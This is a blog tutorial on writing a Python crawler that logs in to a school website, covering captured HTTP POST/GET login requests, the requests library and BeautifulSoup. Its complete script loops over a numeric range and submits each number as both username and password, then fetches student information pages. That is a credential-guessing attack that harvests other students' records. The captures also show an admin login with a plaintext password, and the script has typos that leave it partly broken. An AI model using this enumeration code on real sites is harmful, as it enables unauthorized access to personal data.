Programmatically login a Python web crawler

by do son · Published October 18, 2017 · Updated October 18, 2017

I am going to make a web crawler that will login to a school website using my credentials and then crawl certain parts of the site. I am using the Beautiful Soup Python library

Capture packet & analysis HTTP GET&POST Request

The beginning of their own capture package analysis, there have been some problems. Login process analysis is not rigorous, so that when the simulation log cannot log up when the problem, then the seniors to help me under the analysis. The original logon process requires two POST request process, and in the process, before I use the urllib this library to simulate the login, the use of the tips in the use of the request compared to urllib advanced library.

The first POST request

POST /renzheng.jsp HTTP/1.1
Host: target.com
Content-Length: 142
Cache-Control: max-age=0
Origin: http://target.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://target.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close
displayName=&displayPasswd=&select=2&submit.x=36&submit.y=14&operType=911&random_form=-1048366953725273893&userName=admin&passwd=ddos

From the first package we can be seen that the PostData part consists of nine parts:

displayName, displayPasswd
select, submit.x, submit.y
operType, random_form
userName, passwd

The second POST package

POST /servlet/adminservlet HTTP/1.1
Host: target.com
Content-Length: 65
Cache-Control: max-age=0
Origin: http://target.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://target.com/admin.jsp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close
isValidate=false&userName=admin&passwd=ddos&operType=911

We saw that

userName, passwd: these two parameters is the account password, clear text transmission
isValidate defaults to false
operType defaults to 911

The HTTP GET request

GET /student/studentInfo.jsp?userName=xxxx&passwd=xxxxx HTTP/1.1
Host: target.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://target.com/servlet/adminservlet
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close

We saw that

userName, passwd: these two parameters is the account password, clear text transmission

Now, we can start to write our python script.

Simulation construct request packet
In the process of writing Python code, I try to use the object-oriented process, the relevant variables are defined as private variables, in the process of simulating the use of the requests module

Requests library
Requests is a Python HTTP library that provides a number of HTTP-related methods that we can use dir (requests) to view the methods provided by the library.
```
>>> import requests

>>> dir(requests)

['ConnectionError', 'HTTPError', 'NullHandler', 'PreparedRequest', 'Request', 'RequestException', 'Response', 'Session', 'Timeout', 'TooManyRedirects', 'URLRequired', '__author__', '__build__', '__builtins__', '__copyright__', '__doc__', '__file__', '__license__', '__name__', '__package__', '__path__', '__title__', '__version__', 'adapters', 'api', 'auth', 'certs', 'codes', 'compat', 'cookies', 'delete', 'exceptions', 'get', 'head', 'hooks', 'logging', 'models', 'options', 'patch', 'post', 'put', 'request', 'session', 'sessions', 'status_codes', 'structures', 'utils']
```
In this process, we use Session, get, post and content method.
Session

The session object allows you to keep certain parameters across requests. It also keeps cookies between all requests made by the same Session instance

>>> s = requests.Session()
>>> r = s.get(“http://target.com/”)

GET submission method
Request the URL of the response in GET commit mode
>>> r = requests.get(“http://target/”,proxies=proxies,timeout=0.001,params=payload)
params Pass parameters for GET submission
r = requests.get(“http://httpbin.org/get”, params=payload)
proxies If you need to use a proxy, you can configure a single request by providing proxies for any request method:
```
import requests

proxies = {

  "http": "http://10.10.1.10:3128",

  "https": "http://10.10.1.10:1080",

}

requests.get("http://target.com", proxies=proxies)
```
requests stop after waiting for the number of seconds set with the timeout parameter:

>>> requests.get(‘http://github.com’, timeout=0.001)

Traceback (most recent call last):

File “”, line 1, in

requests.exceptions.Timeout: HTTPConnectionPool(host=’github.com’, port=80): Request timed out. (timeout=0.001)

POST submission method

Request the URL of the response in GET commit mode

requests.post(“http://target.com”, header=header, data=data)

Here we only need to add a common part

‘User-Agent’ : ‘Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36’,
‘Content-Type’:’application/x-www-form-urlencoded’,
‘Accept’: ‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8’,
‘Referer’: ‘http://target.com/’,
‘Accept-Encoding’: ‘gzip, deflate’,
‘Accept-Language’: ‘en-US;q=0.8’

data – The information submitted for Post
‘displayName’ : ”,
‘displayPasswd’ : ”,
‘select’: ‘2’,
‘submit.x’: ’43’,
‘submit.y’ : ’12’,
‘operType’ : ‘911’,
‘random_form’ : ‘5129319019753764987’,
‘userName’ : ”,
‘passwd’ : ”

The part of the code Request

BeautifulSoup library

BeautifulSoup is a Python library that can extract data from HTML or XML files. It can be used to navigate through custom documents, find and modify documents through your favorite converters. You can also use the dir() method to view BeautifulSoup info

>>> import BeautifulSoup

>>> dir(BeautifulSoup)

['BeautifulSOAP', 'BeautifulSoup', 'BeautifulStoneSoup', 'CData', 'Comment', 'DEFAULT_OUTPUT_ENCODING', 'Declaration', 'ICantBelieveItsBeautifulSoup', 'MinimalSoup', 'NavigableString', 'PageElement', 'ProcessingInstruction', 'ResultSet', 'RobustHTMLParser', 'RobustInsanelyWackAssHTMLParser', 'RobustWackAssHTMLParser', 'RobustXMLParser', 'SGMLParseError', 'SGMLParser', 'SimplifyingSOAPParser', 'SoupStrainer', 'StopParsing', 'Tag', 'UnicodeDammit', '__author__', '__builtins__', '__copyright__', '__doc__', '__file__', '__license__', '__name__', '__package__', '__version__', '_match_css_class', 'buildTagMap', 'chardet', 'codecs', 'generators', 'markupbase', 'name2codepoint', 're', 'sgmllib', 'types']

Parse it into XML

By default, Beautiful Soup will parse the current document as HTML, and if you want to parse the XML document, add the second argument “xml” to the BeautifulSoup constructor:

soup = BeautifulSoup(markup, “xml”)

find_all()

The find_all () method returns all the tags in the document that match the condition, and the result is a list of values that contain an element In the process of practice because the required information is included in tables under the label, because the return is a list, use the index to locate the tr position of the response, and then for the loop output td content

The code for looping tables is as follows:

tables = soup.findAll('table')  

tab = tables[0]  

for tr in tab.findAll('tr'):  

    for td in tr.findAll('td'):  

        print td.getText(),

The part of the BeautifulSoup code

Thirdrequest = self.__session.get(geturl)

	page = Thirdrequest.content

	soup = BeautifulSoup(page,"lxml")

tr = soup.findAll('tr')

for i in range(5,14):

	for td in tr[i].findAll('td'):

		print  td.getText(),

Exception handling

The try/except statement is used to detect errors in the try statement block so that the except statement captures exception information and processes it.

The complete Python code

# -*- coding: utf-8 -*-

# !/usr/bin/python

import requests

import time

import os

from bs4 import BeautifulSoup

class UCrawler(object):

	"""docstring for UCrawler"""

	__header = {

				'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',

				'Content-Type':'application/x-www-form-urlencoded',

				'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',

				'Referer': 'http://target.com/',

				'Accept-Encoding': 'gzip, deflate',

				'Accept-Language': 'en-US,zh;q=0.8'

		}

	__data1 = {

				'displayName' : '',

		  		'displayPasswd' : '',

		  		'select': '2',

		  		'submit.x': '43',

		  		'submit.y' : '12',

		  		'operType' : '911',

		  		'random_form' : '5129319019753764987',

		 		'userName' : 'xxxxxxx',

		 		'passwd' : 'xxxxxxx'

		}

	__data2 = {

				'isValidate':'false',

				'userName':'xxxxxxx',

				'passwd':'xxxxxxx',

				'operType':'911',

		}

	__posturl1 = 'http://target.com/admin.jsp'

	__posturl2 = 'http://target.com/servlet/adminservlet'

	__session=requests.Session()

	def Firstlogin(self):

		Firstrequest = self.__session.post(self.__posturl1, data=self.__data1, headers=self.__header)

	def Secondlogin(self):

		Secondrequest = self.__session.post(self.__posturl2, data=self.__data2, headers=self.__header)

	def PrintAndGet(self):

		a = range(xxxxxxxx,xxxxxxx)

		for tmp in a:

			try:

				username = str(tmp)

				password = str(tmp)

				self.__data1['userNam']=username

				self.__data1['passwd']=password

				self.__data2['userNam']=username

				self.__data2['passwd']=password

				Firstrequest = self.__session.post(self.__posturl1, data=self.__data1, headers=self.__header)

				Secondrequest = self.__session.post(self.__posturl2, data=self.__data2, headers=self.__header)

				geturl = 'http://target.com/student/studentInfo.jsp?userName'+'='+username+'&'+'passwd='+password

				print '\n'

			except IndexError:

				continue

if __name__ == '__main__':

	U = UCrawler()

	U.Firstlogin()

	U.Secondlogin()

	U.PrintAndGet()

Programmatically login a Python web crawler

Search

Brilliantly

Content & Links